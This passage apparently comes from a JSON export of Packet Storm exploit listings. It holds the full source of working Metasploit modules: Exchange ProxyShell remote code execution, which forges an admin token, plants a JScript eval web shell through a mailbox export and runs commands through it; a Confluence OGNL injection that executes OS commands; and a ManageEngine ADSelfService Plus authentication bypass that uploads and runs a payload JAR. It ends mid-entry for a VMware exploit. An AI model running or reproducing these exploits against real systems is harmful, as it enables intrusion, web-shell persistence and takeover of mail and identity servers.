Nokogiri::XML.parse(response.body) \n \nlegacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content \nfail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty? \n \nserver = '' \nxml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item| \ntype = item.at_xpath('./xmlns:Type', xmlns)&.content \nif type == 'EXCH' \nserver = item.at_xpath('./xmlns:Server', xmlns)&.content \nend \nend \nfail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty? \n \n{ server: server, legacy_dn: legacy_dn } \nend \n \ndef request_fqdn \nntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nreceived = send_request_raw( \n'method' => 'RPC_IN_DATA', \n'uri' => normalize_uri('rpc', 'rpcproxy.dll'), \n'headers' => { \n'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\" \n} \n) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nif received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i) \nhash = received['WWW-Authenticate'].split('NTLM ')[1] \nmessage = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash)) \ndns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME] \n \nreturn dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase \nend \n \nfail_with(Failure::NotFound, 'No Backend server was found') \nend \n \n# https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff \ndef request_mapi(_server_name, legacy_dn) \ndata = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \nheaders = { \n'X-RequestType' => 'Connect', \n'X-ClientInfo' => random_mapi_id, \n'X-ClientApplication' => datastore['MapiClientApp'], \n'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\" \n} \n \nsid = '' \nresponse = send_http( \n'POST', \n'/mapi/emsmdb', \ndata: data, \nctype: 'application/mapi-http', \nheaders: headers \n) \nif response&.code == 200 \nsid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s \nend \nfail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty? \n \nsid \nend \n \n# pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin. \ndef run_cve_2021_34473 \nif datastore['BackendServerName'] && !datastore['BackendServerName'].empty? \nserver_name = datastore['BackendServerName'] \nprint_status(\"Internal server name forced to: #{server_name}\") \nelse \nprint_status('Retrieving backend FQDN over RPC request') \nserver_name = request_fqdn \nprint_status(\"Internal server name: #{server_name}\") \nend \n@backend_server_name = server_name \n \n# get information via an autodiscover request. \nprint_status('Sending autodiscover request') \nautodiscover = request_autodiscover(server_name) \n \nprint_status(\"Server: #{autodiscover[:server]}\") \nprint_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\") \n \n# get the user UID using mapi request. \nprint_status('Sending mapi request') \nmailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn]) \nprint_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\") \n \nsend_payload(mailbox_user_sid) \n@common_access_token = build_token(mailbox_user_sid) \nend \n \ndef send_http(method, uri, opts = {}) \nssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nunless opts[:cookie] == :none \nopts[:cookie] = \"Email=#{ssrf}\" \nend \n \nrequest = { \n'method' => method, \n'uri' => \"/#{ssrf}#{uri}\", \n'agent' => datastore['UserAgent'], \n'ctype' => opts[:ctype], \n'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' } \n} \nrequest = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil? \nrequest = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil? \nrequest = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil? \n \nreceived = send_request_cgi(request) \nfail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received \n \nreceived \nend \n \ndef send_payload(user_sid) \n@shell_input_name = rand_text_alphanumeric(8..12) \n@draft_subject = rand_text_alphanumeric(8..12) \npayload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\")) \nfile_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\" \nenvelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject) \n \nsend_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8') \nend \n \ndef soap_autodiscover \n<<~SOAP \n<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress> \n<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \nSOAP \nend \n \ndef web_directory \nif datastore['UseAlternatePath'] \ndatastore['IISWritePath'].gsub('\\\\', '/') \nelse \ndatastore['ExchangeWritePath'].gsub('\\\\', '/') \nend \nend \n \ndef build_token(sid) \nuint8_tlv = proc do |type, value| \ntype + [value.length].pack('C') + value \nend \n \ntoken = uint8_tlv.call('V', \"\\x00\") \ntoken << uint8_tlv.call('T', 'Windows') \ntoken << \"\\x43\\x00\" \ntoken << uint8_tlv.call('A', 'Kerberos') \ntoken << uint8_tlv.call('L', datastore['EMAIL']) \ntoken << uint8_tlv.call('U', sid) \n \n# group data for S-1-5-32-544 \ntoken << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\" \nRex::Text.encode_base64(token) \nend \n \ndef execute_powershell(cmdlet, args: []) \nwinrm = SSRFWinRMConnection.new({ \nendpoint: full_uri('PowerShell/'), \ntransport: :ssrf, \nssrf_proc: proc do |method, uri, opts| \nuri = \"#{uri}?X-Rps-CAT=#{@common_access_token}\" \nuri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\" \nopts[:cookie] = :none \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>}, \n\"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\" \n) \nopts[:data].gsub!( \n%r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>}, \n\"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\" \n) \nsend_http(method, uri, opts) \nend \n}) \n \nwinrm.shell(:powershell) do |shell| \nshell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH) \nshell.extend(SSRFWinRMConnection::PowerShell) \nshell.run({ cmdlet: cmdlet, args: args }) \nend \nend \n \ndef exploit \n@ssrf_email ||= Faker::Internet.email \nprint_status('Attempt to exploit for CVE-2021-34473') \nrun_cve_2021_34473 \n \npowershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none) \nfail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200 \n \nprint_status('Assigning the \\'Mailbox Import Export\\' role') \nexecute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ]) \n \n@shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\" \nif datastore['UseAlternatePath'] \nunc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nelse \nunc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\" \nunc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\" \nend \n \nnormal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\') \nprint_status(\"Writing to: #{normal_path}\") \nregister_file_for_cleanup(normal_path) \n \n@export_name = rand_text_alphanumeric(8..12) \nexecute_powershell('New-MailboxExportRequest', args: [ \n{ name: '-Name', value: @export_name }, \n{ name: '-Mailbox', value: datastore['EMAIL'] }, \n{ name: '-IncludeFolders', value: '#Drafts#' }, \n{ name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" }, \n{ name: '-ExcludeDumpster' }, \n{ name: '-FilePath', value: unc_path } \n]) \n \nprint_status('Waiting for the export request to complete...') \n30.times do \nif execute_command('whoami')&.code == 200 \nprint_good('The mailbox export request has completed') \nbreak \nend \nsleep 5 \nend \n \nprint_status('Triggering the payload') \ncase target['Type'] \nwhen :windows_command \nvprint_status(\"Generated payload: #{payload.encoded}\") \n \nif !cmd_windows_generic? \nexecute_command(payload.encoded) \nelse \nboundary = rand_text_alphanumeric(8..12) \nresponse = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\") \n \nprint_warning('Dumping command output in response') \nif response.body =~ /START#{boundary}(.*)END#{boundary}/m \nprint_line(Regexp.last_match(1).strip) \nelse \nprint_error('Empty response, no command output') \nend \nend \nwhen :windows_dropper \nexecute_command(generate_cmdstager(concat_operator: ';').join) \nwhen :windows_powershell \ncmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true) \nexecute_command(cmd) \nend \nend \n \ndef cleanup \nsuper \nreturn unless @common_access_token && @export_name \n \nprint_status('Removing the mailbox export request') \nexecute_powershell('Remove-MailboxExportRequest', args: [ \n{ name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" }, \n{ name: '-Confirm', value: false } \n]) \nend \n \ndef execute_command(cmd, _opts = {}) \nif !cmd_windows_generic? \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\" \nelse \ncmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\" \nend \n \nsend_request_raw( \n'method' => 'POST', \n'uri' => normalize_uri(web_directory, @shell_filename), \n'ctype' => 'application/x-www-form-urlencoded', \n'data' => \"#{@shell_input_name}=#{cmd}\" \n) \nend \nend \n \nclass PstEncoding \nENCODE_TABLE = [ \n71, 241, 180, 230, 11, 106, 114, 72, \n133, 78, 158, 235, 226, 248, 148, 83, \n224, 187, 160, 2, 232, 90, 9, 171, \n219, 227, 186, 198, 124, 195, 16, 221, \n57, 5, 150, 48, 245, 55, 96, 130, \n140, 201, 19, 74, 107, 29, 243, 251, \n143, 38, 151, 202, 145, 23, 1, 196, \n50, 45, 110, 49, 149, 255, 217, 35, \n209, 0, 94, 121, 220, 68, 59, 26, \n40, 197, 97, 87, 32, 144, 61, 131, \n185, 67, 190, 103, 210, 70, 66, 118, \n192, 109, 91, 126, 178, 15, 22, 41, \n60, 169, 3, 84, 13, 218, 93, 223, \n246, 183, 199, 98, 205, 141, 6, 211, \n105, 92, 134, 214, 20, 247, 165, 102, \n117, 172, 177, 233, 69, 33, 112, 12, \n135, 159, 116, 164, 34, 76, 111, 191, \n31, 86, 170, 46, 179, 120, 51, 80, \n176, 163, 146, 188, 207, 25, 28, 167, \n99, 203, 30, 77, 62, 75, 27, 155, \n79, 231, 240, 238, 173, 58, 181, 89, \n4, 234, 64, 85, 37, 81, 229, 122, \n137, 56, 104, 82, 123, 252, 39, 174, \n215, 189, 250, 7, 244, 204, 142, 95, \n239, 53, 156, 132, 43, 21, 213, 119, \n52, 73, 182, 18, 10, 127, 113, 136, \n253, 157, 24, 65, 125, 147, 216, 88, \n44, 206, 254, 36, 175, 222, 184, 54, \n200, 161, 128, 166, 153, 152, 168, 47, \n14, 129, 101, 115, 228, 194, 162, 138, \n212, 225, 17, 208, 8, 139, 42, 242, \n237, 154, 100, 63, 193, 108, 249, 236 \n].freeze \n \ndef self.encode(data) \nencoded = '' \ndata.each_char do |char| \nencoded << ENCODE_TABLE[char.ord].chr \nend \nencoded \nend \nend \n \nclass XMLTemplate \ndef self.render(template_name, context = nil) \nfile_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', \"#{template_name}.xml.erb\") \ntemplate = ::File.binread(file_path) \ncase context \nwhen Hash \nb = binding \nlocals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" } \nb.eval(locals.join) \nelse \nraise ArgumentError \nend \nb.eval(Erubi::Engine.new(template).src) \nend \nend \n \nclass SSRFWinRMConnection < WinRM::Connection \nclass MessageFactory < WinRM::PSRP::MessageFactory \ndef self.create_pipeline_message(runspace_pool_id, pipeline_id, command) \nWinRM::PSRP::Message.new( \nrunspace_pool_id, \nWinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline], \nXMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]), \npipeline_id \n) \nend \nend \n \n# we have to define this class so we can define our own transport factory that provides one backed by the SSRF \n# vulnerability \nclass TransportFactory < WinRM::HTTP::TransportFactory \nclass HttpSsrf < WinRM::HTTP::HttpTransport \n# rubocop:disable Lint/ \ndef initialize(endpoint, options) \n@endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint \n@ssrf_proc = options[:ssrf_proc] \nend \n \ndef send_request(message) \nresp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message }) \nWinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml \nend \nend \n \ndef create_transport(connection_opts) \nraise NotImplementedError unless connection_opts[:transport] == :ssrf \n \nsuper \nend \n \nprivate \n \ndef init_ssrf_transport(opts) \nHttpSsrf.new(opts[:endpoint], opts) \nend \nend \n \nmodule PowerShell \ndef send_command(command, _arguments) \ncommand_id = SecureRandom.uuid.to_s.upcase \nmessage = MessageFactory.create_pipeline_message(@runspace_id, command_id, command) \nfragmenter.fragment(message) do |fragment| \ncommand_args = [connection_opts, shell_id, command_id, fragment] \nif fragment.start_fragment \nresp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build) \ncommand_id = REXML::XPath.first(resp_doc, \"//*[local-name() = 'CommandId']\").text \nelse \ntransport.send_request(WinRM::WSMV::SendData.new(*command_args).build) \nend \nend \n \ncommand_id \nend \nend \n \ndef initialize(connection_opts) \n# these have to be set to truthy values to pass the option validation, but they're not actually used because hax \nconnection_opts.merge!({ user: :ssrf, password: :ssrf }) \nsuper(connection_opts) \nend \n \ndef transport \n@transport ||= begin \ntransport_factory = TransportFactory.new \ntransport_factory.create_transport(@connection_opts) \nend \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/163895/exchange_proxyshell_rce.rb.txt"}, {"lastseen": "2022-06-08T16:37:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-08T00:00:00", "id": "PACKETSTORM:167449", "href": "https://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence Namespace OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to \nevaluate an OGNL expression resulting in OS command execution. \n}, \n'Author' => [ \n'Unknown', # exploited in the wild \n'bturner-r7', \n'jbaines-r7', \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'], \n['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'], \n['URL', 'https://github.com/jbaines-r7/through_the_wire'], \n['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis'] \n], \n'DisclosureDate' => '2022-06-02', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nversion = get_confluence_version \nreturn CheckCode::Unknown unless version \n \nvprint_status(\"Detected Confluence version: #{version}\") \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl('', header: header) # empty command works for testing, the header will be set \n \nreturn CheckCode::Unknown unless res \n \nunless res && res.headers.include?(header) \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef get_confluence_version \nreturn @confluence_version if @confluence_version \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login.action') \n) \nreturn nil unless res&.code == 200 \n \npoweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text \nreturn nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/ \n \n@confluence_version = Rex::Version.new(Regexp.last_match(1)) \n@confluence_version \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl(cmd, header: header) \n \nunless res && res.headers.include?(header) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nres.headers[header] \nend \n \ndef inject_ognl(cmd, header:) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'), \n'headers' => { header => cmd } \n) \nend \n \ndef ognl_payload(_cmd, header:) \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n${ \nClass.forName(\"com.opensymphony.webwork.ServletActionContext\") \n.getMethod(\"getResponse\",null) \n.invoke(null,null) \n.setHeader(\"#{header}\", \nClass.forName(\"javax.script.ScriptEngineManager\") \n.newInstance() \n.getEngineByName(\"js\") \n.eval(\"java.lang.Runtime.getRuntime().exec([ \n#{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"}, \ncom.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}') \n]); '#{Faker::Internet.uuid}'\") \n) \n} \nOGNL \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167449/atlassian_confluence_namespace_ognl_injection.rb.txt"}, {"lastseen": "2021-11-27T05:17:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "packetstorm", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "PACKETSTORM:165085", "href": "https://packetstormsecurity.com/files/165085/ManageEngine-ADSelfService-Plus-Authentication-Bypass-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539', \n'Description' => %q{ \nThis module exploits CVE-2021-40539, a REST API authentication bypass \nvulnerability in ManageEngine ADSelfService Plus, to upload a JAR and \nexecute it as the user running ADSelfService Plus - which is SYSTEM if \nstarted as a service. \n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'Antoine Cervoise', # Independent analysis and RCE \n'Wilfried B\u00e9card', # Independent analysis and RCE \n'mr_me', # keytool classloading technique \n'wvu' # Initial analysis and module \n], \n'References' => [ \n['CVE', '2021-40539'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'], \n['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'], \n['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'], \n['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py'] \n], \n'DisclosureDate' => '2021-09-07', \n'License' => MSF_LICENSE, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true if ADSelfService Plus is run as a service \n'Targets' => [ \n['Java Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'vars_post' => { \n'methodToCall' => 'previewMobLogo' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target failed to respond to check.') \nend \n \nunless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg}) \nreturn CheckCode::Safe('Failed to bypass REST API authentication.') \nend \n \nCheckCode::Vulnerable('Successfully bypassed REST API authentication.') \nend \n \ndef exploit \nupload_payload_jar \nexecute_payload_jar \nend \n \ndef upload_payload_jar \nprint_status(\"Uploading payload JAR: #{jar_filename}\") \n \njar = payload.encoded_jar \njar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh \n \nform = Rex::MIME::Message.new \nform.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"') \nform.add_part('yas', nil, nil, 'form-data; name=\"Save\"') \nform.add_part('smartcard', nil, nil, 'form-data; name=\"form\"') \nform.add_part('Add', nil, nil, 'form-data; name=\"operation\"') \nform.add_part(jar.pack, 'application/java-archive', 'binary', \n%(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\")) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 404 \nfail_with(Failure::NotVulnerable, 'Failed to upload payload JAR') \nend \n \n# C:\\ManageEngine\\ADSelfService Plus\\bin (working directory) \nregister_file_for_cleanup(jar_filename) \n \nprint_good('Successfully uploaded payload JAR') \nend \n \ndef execute_payload_jar \nprint_status('Executing payload JAR') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'), \n'vars_post' => { \n'methodToCall' => 'openSSLTool', \n'action' => 'generateCSR', \n# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html \n'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\" \n} \n) \n \nunless res&.code == 404 \nfail_with(Failure::PayloadFailed, 'Failed to execute payload JAR') \nend \n \nprint_good('Successfully executed payload JAR') \nend \n \ndef jar_filename \n@jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\" \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165085/manageengine_adselfservice_plus_cve_2021_40539.rb.txt"}, {"lastseen": "2022-05-03T15:49:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-03T00:00:00", "type": "packetstorm", "title": "VMware Workspace ONE Access Template Injection / Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", 